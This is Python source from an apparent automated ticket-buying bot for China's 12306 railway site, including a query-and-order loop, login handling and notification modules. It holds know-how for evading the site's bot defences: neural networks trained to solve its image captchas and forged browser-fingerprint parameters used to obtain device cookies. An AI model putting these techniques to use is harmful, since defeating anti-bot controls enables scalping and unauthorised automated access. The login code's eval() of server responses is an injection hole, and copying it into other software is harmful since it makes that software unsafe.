station: :return: """ path = os.path.join(os.path.dirname(__file__), '../station_name.txt') try: with open(path, encoding="utf-8") as result: info = result.read().split('=')[1].strip("'").split('@') except Exception: with open(path) as result: info = result.read().split('=')[1].strip("'").split('@') del info[0] station_name = {} for i in range(0, len(info)): n_info = info[i].split('|') station_name[n_info[1]] = n_info[2] try: from_station = station_name[from_station.encode("utf8")] to_station = station_name[to_station.encode("utf8")] except KeyError: from_station = station_name[from_station] to_station = station_name[to_station] return from_station, to_station def call_login(self, auth=False): """ 登录回调方法 :return: """ if auth: return self.login.auth() else: configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠 self.login.go_login() def main(self): l = liftTicketInit(self) l.reqLiftTicketInit() getDrvicesID(self) self.call_login() check_user = checkUser(self) t = threading.Thread(target=check_user.sendCheckUser) t.setDaemon(True) t.start() from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION) num = 0 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES) passenger = s.sendGetPassengerDTOs() wrapcache.set("user_info", passenger, timeout=9999999) now = datetime.datetime.now() if TickerConfig.ORDER_MODEL is 1: print(f"预售还未开始,阻塞中,预售时间为{TickerConfig.OPEN_TIME}, 当前时间为: {now.strftime('%H:%M:%S')}") sleep_time_s = 0.1 sleep_time_t = 0.3 # 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案 while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME: now = datetime.datetime.now() time.sleep(0.0001) print(f"预售开始,开启时间为: {now.strftime('%H:%M:%S')}") else: sleep_time_s = TickerConfig.MIN_TIME sleep_time_t = TickerConfig.MAX_TIME while 1: try: num += 1 now = datetime.datetime.now() # 感谢群里大佬提供整点代码 configCommon.checkSleepTime(self) # 晚上到点休眠 q = query(selectObj=self, from_station=from_station, to_station=to_station, from_station_h=TickerConfig.FROM_STATION, to_station_h=TickerConfig.TO_STATION, _station_seat=self._station_seat, station_trains=TickerConfig.STATION_TRAINS, station_dates=TickerConfig.STATION_DATES, ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES), ) queryResult = q.sendQuery() # 查询接口 if queryResult.get("status"): train_no = queryResult.get("train_no", "") train_date = queryResult.get("train_date", "") stationTrainCode = queryResult.get("stationTrainCode", "") secretStr = queryResult.get("secretStr", "") secretList = queryResult.get("secretList", "") seat = queryResult.get("seat", "") leftTicket = queryResult.get("leftTicket", "") query_from_station_name = queryResult.get("query_from_station_name", "") query_to_station_name = queryResult.get("query_to_station_name", "") is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES)) if wrapcache.get(train_no): print(ticket.QUEUE_WARNING_MSG.format(train_no)) else: # 获取联系人 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES, set_type="" if isinstance(seat, list) else seat_conf_2[seat], # 候补订单需要设置多个坐席 is_more_ticket_num=is_more_ticket_num) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList) if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get( "passengerTicketStrByAfterLate", "") self.oldPassengerStr = 
getPassengerDTOsResult.get("oldPassengerStr", "") self.set_type = getPassengerDTOsResult.get("set_type", "") # 提交订单 # 订单分为两种,一种为抢单,一种为候补订单 if secretStr: # 正常下单 if TickerConfig.ORDER_TYPE == 1: # 快速下单 a = autoSubmitOrderRequest(selectObj=self, secretStr=secretStr, train_date=train_date, passengerTicketStr=self.passengerTicketStrList, oldPassengerStr=self.oldPassengerStr, train_no=train_no, stationTrainCode=stationTrainCode, leftTicket=leftTicket, set_type=self.set_type, query_from_station_name=query_from_station_name, query_to_station_name=query_to_station_name, ) a.sendAutoSubmitOrderRequest() elif TickerConfig.ORDER_TYPE == 2: # 普通下单 sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, train_date, TickerConfig.TICKET_PEOPLES) sor.sendSubmitOrderRequest() elif secretList: # 候补订单 c = chechFace(self, secretList, train_no) c.sendChechFace() else: random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2) nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else "" print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}") time.sleep(random_time) except PassengerUserException as e: print(e) break except ticketConfigException as e: print(e) break except ticketIsExitsException as e: print(e) break except ticketNumOutException as e: print(e) break except UserPasswordException as e: print(e) break except ValueError as e: if e == "No JSON object could be decoded": print(u"12306接口无响应,正在重试") else: print(e) except KeyError as e: print(e) except TypeError as e: print(u"12306接口无响应,正在重试 {0}".format(e)) except socket.error as e: print(e) if __name__ == '__main__': s = select() cdn = s.station_table("长沙", "深圳") File: init/login.py # -*- coding=utf-8 -*- import copy import time from collections import OrderedDict from time import sleep import TickerConfig from inter.GetPassCodeNewOrderAndLogin import getPassCodeNewOrderAndLogin1 from inter.GetRandCode import getRandCode from inter.LoginAysnSuggest import loginAysnSuggest from inter.LoginConf import loginConf from myException.UserPasswordException import UserPasswordException class GoLogin: def __init__(self, session, is_auto_code, auto_code_type): self.session = session self.randCode = "" self.is_auto_code = is_auto_code self.auto_code_type = auto_code_type def auth(self): """ :return: """ self.session.httpClint.send(self.session.urls["loginInitCdn1"]) uamtkStaticUrl = self.session.urls["uamtk-static"] uamtkStaticData = {"appid": "otn"} return self.session.httpClint.send(uamtkStaticUrl, uamtkStaticData) def codeCheck(self): """ 验证码校验 :return: """ codeCheckUrl = copy.deepcopy(self.session.urls["codeCheck1"]) codeCheckUrl["req_url"] = codeCheckUrl["req_url"].format(self.randCode, int(time.time() * 1000)) fresult = self.session.httpClint.send(codeCheckUrl) if not isinstance(fresult, str): print("登录失败") return fresult = eval(fresult.split("(")[1].split(")")[0]) if "result_code" in fresult and fresult["result_code"] == "4": print(u"验证码通过,开始登录..") return True else: if "result_message" in fresult: print(fresult["result_message"]) sleep(1) self.session.httpClint.del_cookies() def baseLogin(self, user, passwd): """ 登录过程 :param user: :param passwd: :return: 权限校验码 """ logurl = self.session.urls["login"] loginData = OrderedDict() loginData["username"] = user, loginData["password"] = passwd, 
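# Sketch (illustrative, not part of the original sources): codeCheck() above unwraps a jQuery
# JSONP response with eval(). A safer version of the same unwrapping using a regex plus
# json.loads; the sample payload below is an assumption, only its shape follows the code above:
import json
import re

def parse_jsonp(text):
    """Extract the JSON object from a 'callback({...})' style response."""
    match = re.search(r'\((\{.*\})\)', text, re.S)
    if not match:
        raise ValueError("not a JSONP payload")
    return json.loads(match.group(1))

sample = 'jQuery19108016482864806321_1554298927290({"result_code":"4","result_message":"ok"})'
print(parse_jsonp(sample)["result_code"])  # '4'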
loginData["appid"] = "otn", loginData["answer"] = self.randCode, tresult = self.session.httpClint.send(logurl, loginData) if 'result_code' in tresult and tresult["result_code"] == 0: print(u"登录成功") tk = self.auth() if "newapptk" in tk and tk["newapptk"]: return tk["newapptk"] else: return False elif 'result_message' in tresult and tresult['result_message']: messages = tresult['result_message'] if messages.find(u"密码输入错误") is not -1: raise UserPasswordException("{0}".format(messages)) else: print(u"登录失败: {0}".format(messages)) print(u"尝试重新登陆") return False else: return False def getUserName(self, uamtk): """ 登录成功后,显示用户名 :return: """ if not uamtk: return u"权限校验码不能为空" else: uamauthclientUrl = self.session.urls["uamauthclient"] data = {"tk": uamtk} uamauthclientResult = self.session.httpClint.send(uamauthclientUrl, data) if uamauthclientResult: if "result_code" in uamauthclientResult and uamauthclientResult["result_code"] == 0: print(u"欢迎 {} 登录".format(uamauthclientResult["username"])) return True else: return False else: self.session.httpClint.send(uamauthclientUrl, data) url = self.session.urls["getUserInfo"] self.session.httpClint.send(url) def go_login(self): """ 登陆 :param user: 账户名 :param passwd: 密码 :return: """ user, passwd = TickerConfig.USER, TickerConfig.PWD if not user or not passwd: raise UserPasswordException(u"温馨提示: 用户名或者密码为空,请仔细检查") login_num = 0 while True: if loginConf(self.session): result = getPassCodeNewOrderAndLogin1(session=self.session, imgType="login") if not result: continue self.randCode = getRandCode(self.is_auto_code, self.auto_code_type, result) print(self.randCode) login_num += 1 self.auth() if self.codeCheck(): uamtk = self.baseLogin(user, passwd) if uamtk: self.getUserName(uamtk) break else: loginAysnSuggest(self.session, username=user, password=passwd) login_num += 1 break File: verify/mlearn_for_image.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import sys import cv2 import numpy as np from keras import models from keras import layers from keras import optimizers from keras.applications import VGG16 from keras.callbacks import ReduceLROnPlateau from keras.preprocessing.image import ImageDataGenerator def preprocess_input(x): x = x.astype('float32') # 我是用cv2来读取的图片,其已经是BGR格式了 mean = [103.939, 116.779, 123.68] x -= mean return x def load_data(): # 这是统计学专家提供的训练集 data = np.load('captcha.npz') train_x, train_y = data['images'], data['labels'] train_x = preprocess_input(train_x) # 由于是统计得来的信息,所以在此给定可信度 sample_weight = train_y.max(axis=1) / np.sqrt(train_y.sum(axis=1)) sample_weight /= sample_weight.mean() train_y = train_y.argmax(axis=1) # 这是人工提供的验证集 data = np.load('captcha.test.npz') test_x, test_y = data['images'], data['labels'] test_x = preprocess_input(test_x) return (train_x, train_y, sample_weight), (test_x, test_y) def learn(): (train_x, train_y, sample_weight), (test_x, test_y) = load_data() datagen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True) train_generator = datagen.flow(train_x, train_y, sample_weight=sample_weight) base = VGG16(weights='imagenet', include_top=False, input_shape=(None, None, 3)) for layer in base.layers[:-4]: layer.trainable = False model = models.Sequential([ base, layers.BatchNormalization(), layers.Conv2D(64, (3, 3), activation='relu', padding='same'), layers.GlobalAveragePooling2D(), layers.BatchNormalization(), layers.Dense(64, activation='relu'), layers.BatchNormalization(), layers.Dropout(0.20), layers.Dense(80, activation='softmax') ]) 
model.compile(optimizer=optimizers.RMSprop(lr=1e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() reduce_lr = ReduceLROnPlateau(verbose=1) model.fit_generator(train_generator, epochs=400, steps_per_epoch=100, validation_data=(test_x[:800], test_y[:800]), callbacks=[reduce_lr]) result = model.evaluate(test_x, test_y) print(result) model.save('12306.image.model.h5', include_optimizer=False) def predict(imgs): imgs = preprocess_input(imgs) model = models.load_model('12306.image.model.h5') labels = model.predict(imgs) return labels def _predict(fn): imgs = cv2.imread(fn) imgs = cv2.resize(imgs, (67, 67)) imgs.shape = (-1, 67, 67, 3) labels = predict(imgs) print(labels.max(axis=1)) print(labels.argmax(axis=1)) if __name__ == '__main__': if len(sys.argv) >= 2: _predict(sys.argv[1]) else: learn() File: verify/pretreatment.py #! env python # coding: utf-8 # 功能:对图像进行预处理,将文字部分单独提取出来 # 并存放到ocr目录下 # 文件名为原验证码文件的文件名 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import hashlib import os import pathlib import cv2 import numpy as np import requests import scipy.fftpack PATH = 'imgs' def download_image(): # 抓取验证码 # 存放到指定path下 # 文件名为图像的MD5 url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand' r = requests.get(url) fn = hashlib.md5(r.content).hexdigest() with open(f'{PATH}/{fn}.jpg', 'wb') as fp: fp.write(r.content) def download_images(): pathlib.Path(PATH).mkdir(exist_ok=True) for idx in range(40000): download_image() print(idx) def get_text(img, offset=0): # 得到图像中的文本部分 return img[3:22, 120 + offset:177 + offset] def avhash(im): im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC) avg = im.mean() im = im > avg im = np.packbits(im) return im def phash(im): im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC) im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1) im = im[:8, :8] med = np.median(im) im = im > med im = np.packbits(im) return im def _get_imgs(img): interval = 5 length = 67 for x in range(40, img.shape[0] - length, interval + length): for y in range(interval, img.shape[1] - length, interval + length): yield img[x:x + length, y:y + length] def get_imgs(img): imgs = [] for img in _get_imgs(img): imgs.append(phash(img)) return imgs def pretreat(): if not os.path.isdir(PATH): download_images() texts, imgs = [], [] for img in os.listdir(PATH): img = os.path.join(PATH, img) img = cv2.imread(img, cv2.IMREAD_GRAYSCALE) texts.append(get_text(img)) imgs.append(get_imgs(img)) return texts, imgs def load_data(path='data.npz'): if not os.path.isfile(path): texts, imgs = pretreat() np.savez(path, texts=texts, images=imgs) f = np.load(path) return f['texts'], f['images'] if __name__ == '__main__': texts, imgs = load_data() print(texts.shape) print(imgs.shape) imgs = imgs.reshape(-1, 8) print(np.unique(imgs, axis=0).shape) File: verify/__init__.py File: verify/localVerifyCode.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import base64 import os import cv2 import numpy as np from keras import models, backend import tensorflow as tf from verify import pretreatment from verify.mlearn_for_image import preprocess_input graph = tf.get_default_graph() PATH = lambda p: os.path.abspath( os.path.join(os.path.dirname(__file__), p) ) TEXT_MODEL = "" IMG_MODEL = "" def get_text(img, offset=0): text = pretreatment.get_text(img, offset) text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY) text = text / 255.0 h, w = text.shape text.shape = (1, h, w, 1) return text def base64_to_image(base64_code): # base64解码 
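# Sketch (illustrative, not part of the original sources): avhash()/phash() above turn each
# 67x67 candidate image into a compact fingerprint (resize, threshold against the mean/median,
# np.packbits). The average-hash idea plus a Hamming-distance comparison, without the OpenCV
# resize so it stays self-contained:
import numpy as np

def average_hash(gray_8x8):
    """gray_8x8: an 8x8 array of pixel intensities -> 8-byte fingerprint."""
    bits = gray_8x8 > gray_8x8.mean()
    return np.packbits(bits.flatten())

def hamming(a, b):
    return int(np.unpackbits(np.bitwise_xor(a, b)).sum())

img_a = np.random.randint(0, 256, (8, 8))
img_b = img_a.copy()
img_b[0, 0] += 1  # a tiny change keeps the Hamming distance small (often zero)
print(hamming(average_hash(img_a), average_hash(img_b)))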
img_data = base64.b64decode(base64_code) # 转换为np数组 img_array = np.fromstring(img_data, np.uint8) # 转换成opencv可用格式 img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR) return img class Verify: def __init__(self): self.textModel = "" self.imgModel = "" self.loadImgModel() self.loadTextModel() def loadTextModel(self): if not self.textModel: self.textModel = models.load_model(PATH('../model.v2.0.h5')) else: print("无需加载模型model.v2.0.h5") def loadImgModel(self): if not self.imgModel: self.imgModel = models.load_model(PATH('../12306.image.model.h5')) def verify(self, fn): verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺', '海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅', '电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮', '菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟', '刺绣', '铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴', '薯条', '蜜蜂', '日历', '口哨'] # 读取并预处理验证码 img = base64_to_image(fn) text = get_text(img) imgs = np.array(list(pretreatment._get_imgs(img))) imgs = preprocess_input(imgs) text_list = [] # 识别文字 self.loadTextModel() global graph with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) # 获取下一个词 # 根据第一个词的长度来定位第二个词的位置 if len(text) == 1: offset = 27 elif len(text) == 2: offset = 47 else: offset = 60 text = get_text(img, offset=offset) if text.mean() < 0.95: with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) print("题目为{}".format(text_list)) # 加载图片分类器 self.loadImgModel() with graph.as_default(): labels = self.imgModel.predict(imgs) labels = labels.argmax(axis=1) results = [] for pos, label in enumerate(labels): l = verify_titles[label] print(pos + 1, l) if l in text_list: results.append(str(pos + 1)) return results if __name__ == '__main__': pass # verify("verify-img1.jpeg") File: config/emailConf.py # -*- coding: utf8 -*- import socket __author__ = 'MR.wen' import TickerConfig from email.header import Header from email.mime.text import MIMEText import smtplib def sendEmail(msg): """ 邮件通知 :param str: email content :return: """ try: if TickerConfig.EMAIL_CONF["IS_MAIL"]: sender = TickerConfig.EMAIL_CONF["email"] receiver = TickerConfig.EMAIL_CONF["notice_email_list"] subject = '恭喜,您已订票成功' username = TickerConfig.EMAIL_CONF["username"] password = TickerConfig.EMAIL_CONF["password"] host = TickerConfig.EMAIL_CONF["host"] s = "{0}".format(msg) msg = MIMEText(s, 'plain', 'utf-8') # 中文需参数‘utf-8’,单字节字符不需要 msg['Subject'] = Header(subject, 'utf-8') msg['From'] = sender msg['To'] = receiver try: smtp = smtplib.SMTP_SSL(host) smtp.connect(host) except socket.error: smtp = smtplib.SMTP() smtp.connect(host) smtp.connect(host) smtp.login(username, password) smtp.sendmail(sender, receiver.split(","), msg.as_string()) smtp.quit() print(u"邮件已通知, 请查收") except Exception as e: print(u"邮件配置有误{}".format(e)) if __name__ == '__main__': sendEmail(1) File: config/pushbearConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_BEAR_API_PATH = "https://pushbear.ftqq.com/sub" def sendPushBear(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if TickerConfig.PUSHBEAR_CONF["is_pushbear"] and TickerConfig.PUSHBEAR_CONF["send_key"].strip() != "": try: 
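# Sketch (illustrative, not part of the original sources): base64_to_image() above decodes the
# captcha with the deprecated np.fromstring and passes a COLOR_* constant to cv2.imdecode, whose
# second argument is an IMREAD_* flag. The same decode with np.frombuffer and an explicit read
# flag (assumes opencv-python is installed, as elsewhere in the repo):
import base64
import cv2
import numpy as np

def decode_base64_image(b64_string):
    raw = base64.b64decode(b64_string)
    array = np.frombuffer(raw, dtype=np.uint8)
    return cv2.imdecode(array, cv2.IMREAD_COLOR)  # BGR image, matching the model preprocessing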
sendPushBearUrls = urls.get("Pushbear") data = { "sendkey": TickerConfig.PUSHBEAR_CONF["send_key"].strip(), "text": "易行购票成功通知", "desp": msg } httpClint = HTTPClient(0) sendPushBeaRsp = httpClint.send(sendPushBearUrls, data=data) if sendPushBeaRsp.get("code") is 0: print(u"已下发 pushbear 微信通知, 请查收") else: print(sendPushBeaRsp) except Exception as e: print(u"pushbear 配置有误 {}".format(e)) else: pass if __name__ == '__main__': sendPushBear(1) File: config/__init__.py File: config/logger.py #coding: utf-8 import os import time import logging from config import configCommon logger = None loggerHandler = None dateStr = '' #默认拥有日期后缀 suffix = '' #除了日期外的后缀 def setSuffix(s): global suffix suffix = s def getTodayDateStr(): return time.strftime("%Y-%m-%d", time.localtime(configCommon.getNowTimestamp())) def setDateStr(s): global dateStr dateStr = s def isAnotherDay(s): global dateStr return dateStr != s def getLogFile(): global dateStr, suffix rtn = os.path.join(configCommon.getLogDir(), dateStr) if suffix: rtn += "_" + suffix return rtn + ".log" def log(msg, func = "info"): global logger if not logger: logger = logging.getLogger() logger.setLevel(logging.INFO) todayStr = getTodayDateStr() if isAnotherDay(todayStr): setDateStr(todayStr) logger.removeHandler(loggerHandler) fh = logging.FileHandler(getLogFile()) fm = logging.Formatter(u'[%(asctime)s][%(levelname)8s] --- %(message)s (%(filename)s:%(lineno)s)') fh.setFormatter(fm) logger.addHandler(fh) levels = { "debug": logger.debug, "info": logger.info, "warning": logger.warning, "error": logger.error, "critical": logger.critical } levels[func](msg) File: config/configCommon.py # -*- coding: utf-8 -*- import datetime import os import random import sys import time from myException.ticketConfigException import ticketConfigException rushRefreshMinTimeIntval = 2000 rushRefreshMaxTimeIntval = 3600000 rushRefreshTimeIntval = 100 # 最早运行时间 maxRunTime = 6 # 程序停止时间 maxRunStopTime = 23 # 可售天数 maxDate = 29 RS_SUC = 0 RS_TIMEOUT = 1 RS_JSON_ERROR = 2 RS_OTHER_ERROR = 3 seat_conf = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '软座': 24, '硬座': 29, '无座': 26, '动卧': 33, } if sys.version_info.major == 2: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.iteritems()]) else: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.items()]) def getNowTimestamp(): return time.time() def decMakeDir(func): def handleFunc(*args, **kwargs): dirname = func(*args, **kwargs) if not os.path.exists(dirname): os.makedirs(dirname) elif not os.path.isdir(dirname): pass return dirname return func def getWorkDir(): return os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # # def fileOpen(path): # """ # 文件读取兼容2和3 # :param path: 文件读取路径 # :return: # """ # try: # with open(path, "r", ) as f: # return f # except TypeError: # with open(path, "r", ) as f: # return f @decMakeDir def getTmpDir(): return os.path.join(getWorkDir(), "tmp") @decMakeDir def getLogDir(): return os.path.join(getTmpDir(), "log") @decMakeDir def getCacheDir(): return os.path.join(getTmpDir(), "cache") @decMakeDir def getVCodeDir(): return os.path.join(getTmpDir(), "vcode") def getVCodeImageFile(imageName): return os.path.join(getVCodeDir(), imageName + ".jpg") def getCacheFile(cacheType): return os.path.join(getCacheDir(), cacheType + ".cache") def checkSleepTime(session): now = datetime.datetime.now() if now.hour >= maxRunStopTime or now.hour < maxRunTime: print(u"12306休息时间,本程序自动停止,明天早上六点将自动运行") open_time = datetime.datetime(now.year, now.month, now.day, maxRunTime) if open_time < now: open_time += 
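# Sketch (illustrative, not part of the original sources): decMakeDir() above builds a wrapper
# (handleFunc) that creates the returned directory, but then returns the original func, so the
# wrapper is never applied. A version of the decorator that actually returns the wrapper:
import functools
import os

def make_dir_on_return(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        dirname = func(*args, **kwargs)
        os.makedirs(dirname, exist_ok=True)  # idempotent: no error if it already exists
        return dirname
    return wrapper

@make_dir_on_return
def tmp_dir():
    return os.path.join(os.getcwd(), "tmp")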
datetime.timedelta(1) time.sleep((open_time - now).seconds + round(random.uniform(1, 10))) session.call_login() def checkDate(station_dates): """ 检查日期是否合法 :param station_dates: :return: """ today = datetime.datetime.now() maxDay = (today + datetime.timedelta(maxDate)).strftime("%Y-%m-%d") for station_date in station_dates[::-1]: date = datetime.datetime.strftime(datetime.datetime.strptime(station_date, "%Y-%m-%d"), "%Y-%m-%d") if date < today.strftime("%Y-%m-%d") or date > maxDay: print(u"警告:当前时间配置有小于当前时间或者大于最大时间: {}, 已自动忽略".format(station_date)) station_dates.remove(station_date) if not station_dates: print(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") raise ticketConfigException(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") else: station_dates[station_dates.index(station_date)] = date return station_dates File: config/AutoSynchroTime.py # coding=utf-8 import os import platform import ntplib import datetime def autoSynchroTime(): """ 同步北京时间,执行时候,请务必用sudo,sudo,sudo 执行,否则会报权限错误,windows打开ide或者cmd请用管理员身份 :return: """ c = ntplib.NTPClient() hosts = ['ntp1.aliyun.com', 'ntp2.aliyun.com', 'ntp3.aliyun.com', 'ntp4.aliyun.com', 'cn.pool.ntp.org'] print(u"正在同步时间,请耐心等待30秒左右,如果下面有错误发送,可以忽略!!") print(u"系统当前时间{}".format(str(datetime.datetime.now())[:22])) system = platform.system() if system == "Windows": # windows 同步时间未测试过,参考地址:https://www.jianshu.com/p/92ec15da6cc3 for host in hosts: os.popen('w32tm /register') os.popen('net start w32time') os.popen('w32tm /config /manualpeerlist:"{}" /syncfromflags:manual /reliable:yes /update'.format(host)) os.popen('ping -n 3 127.0.0.1 >nul') sin = os.popen('w32tm /resync') if sin is 0: break else: # mac同步地址,如果ntpdate未安装,brew install ntpdate linux 安装 yum install -y ntpdate for host in hosts: sin = os.popen('ntpdate {}'.format(host)) if sin is 0: break print(u"同步后时间:{}".format(str(datetime.datetime.now())[:22])) if __name__ == '__main__': autoSynchroTime() File: config/getCookie.py import json import random import re import time import os import TickerConfig from config.urlConf import urls def getDrvicesID(session): """ :return: """ print("cookie获取中") if TickerConfig.COOKIE_TYPE is 1: from selenium import webdriver cookies = [] # 解决放镜像里 DevToolsActivePort file doesn't exist的问题 options = webdriver.ChromeOptions() if os.name != 'nt' and TickerConfig.CHROME_CHROME_PATH: options = webdriver.ChromeOptions() options.binary_location = TickerConfig.CHROME_CHROME_PATH options.add_argument( '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36') options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome(executable_path=TickerConfig.CHROME_PATH,chrome_options=options) driver.get("https://www.12306.cn/index/index.html") time.sleep(10) for c in driver.get_cookies(): cookie = dict() print() if c.get("name") == "RAIL_DEVICEID" or c.get("name") == "RAIL_EXPIRATION": cookie[c.get("name")] = c.get("value") cookies.append(cookie) print(f"获取cookie: {cookies}") if cookies: session.httpClint.set_cookies(cookies) session.cookies = cookies print("cookie获取完成") elif TickerConfig.COOKIE_TYPE is 2: request_device_id(session) elif TickerConfig.COOKIE_TYPE is 3: # RAIL_DEVICEID,RAIL_EXPIRATION的值打开12306官网可以获取headers-Cookies if not TickerConfig.RAIL_DEVICEID or not TickerConfig.RAIL_EXPIRATION: print("警告!!: RAIL_DEVICEID,RAIL_EXPIRATION的值为空,请手动打开12306官网可以获取headers-Cookies中的RAIL_DEVICEID,RAIL_EXPIRATION,填入配置文件中") cookies = [{ "RAIL_DEVICEID": TickerConfig.RAIL_DEVICEID, "RAIL_EXPIRATION": 
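# Sketch (illustrative, not part of the original sources): autoSynchroTime() above creates an
# ntplib.NTPClient but never queries it, and compares the file object returned by os.popen()
# with `is 0`, which is never true. Reading the clock offset directly with ntplib (the host is
# one of the servers already listed above):
import ntplib

def clock_offset_seconds(host="ntp1.aliyun.com"):
    """Return how far the local clock drifts from the NTP server, in seconds."""
    response = ntplib.NTPClient().request(host, version=3, timeout=5)
    return response.offset

# Example: print("local clock is off by {:+.3f}s".format(clock_offset_seconds()))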
TickerConfig.RAIL_EXPIRATION, }] session.httpClint.set_cookies(cookies) session.cookies = cookies def request_device_id(session): """ 获取加密后的浏览器特征 ID :return: """ params = {"algID": request_alg_id(session), "timestamp": int(time.time() * 1000)} params = dict(params, **_get_hash_code_params()) response = session.httpClint.send(urls.get("getDevicesId"), params=params) if response.find('callbackFunction') >= 0: result = response[18:-2] try: result = json.loads(result) session.httpClint.set_cookies([{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }]) session.cookies = [{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }] except: return False def request_alg_id(session): response = session.httpClint.send(urls.get("GetJS")) result = re.search(r'algID\\x3d(.*?)\\x26', response) try: return result.group(1) except (IndexError, AttributeError) as e: pass return "" def _get_hash_code_params(): from collections import OrderedDict data = { 'adblock': '0', 'browserLanguage': 'en-US', 'cookieEnabled': '1', 'custID': '133', 'doNotTrack': 'unknown', 'flashVersion': '0', 'javaEnabled': '0', 'jsFonts': 'c227b88b01f5c513710d4b9f16a5ce52', 'localCode': '3232236206', 'mimeTypes': '52d67b2a5aa5e031084733d5006cc664', 'os': 'MacIntel', 'platform': 'WEB', 'plugins': 'd22ca0b81584fbea62237b14bd04c866', 'scrAvailSize': str(random.randint(500, 1000)) + 'x1920', 'srcScreenSize': '24xx1080x1920', 'storeDb': 'i1l1o1s1', 'timeZone': '-8', 'touchSupport': '99115dfb07133750ba677d055874de87', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( random.randint( 5000, 7000)) + '.0 Safari/537.36', 'webSmartID': 'f4e3b7b14cc647e30a6267028ad54c56', } data_trans = { 'browserVersion': 'd435', 'touchSupport': 'wNLf', 'systemLanguage': 'e6OK', 'scrWidth': 'ssI5', 'openDatabase': 'V8vl', 'scrAvailSize': 'TeRS', 'hasLiedResolution': '3neK', 'hasLiedOs': 'ci5c', 'timeZone': 'q5aJ', 'userAgent': '0aew', 'userLanguage': 'hLzX', 'jsFonts': 'EOQP', 'scrAvailHeight': '88tV', 'browserName': '-UVA', 'cookieCode': 'VySQ', 'online': '9vyE', 'scrAvailWidth': 'E-lJ', 'flashVersion': 'dzuS', 'scrDeviceXDPI': '3jCe', 'srcScreenSize': 'tOHY', 'storeDb': 'Fvje', 'doNotTrack': 'VEek', 'mimeTypes': 'jp76', 'sessionStorage': 'HVia', 'cookieEnabled': 'VPIf', 'os': 'hAqN', 'hasLiedLanguages': 'j5po', 'hasLiedBrowser': '2xC5', 'webSmartID': 'E3gR', 'appcodeName': 'qT7b', 'javaEnabled': 'yD16', 'plugins': 'ks0Q', 'appMinorVersion': 'qBVW', 'cpuClass': 'Md7A', 'indexedDb': '3sw-', 'adblock': 'FMQw', 'localCode': 'lEnu', 'browserLanguage': 'q4f3', 'scrHeight': '5Jwy', 'localStorage': 'XM7l', 'historyList': 'kU5z', 'scrColorDepth': "qmyu" } data = OrderedDict(data) d = '' 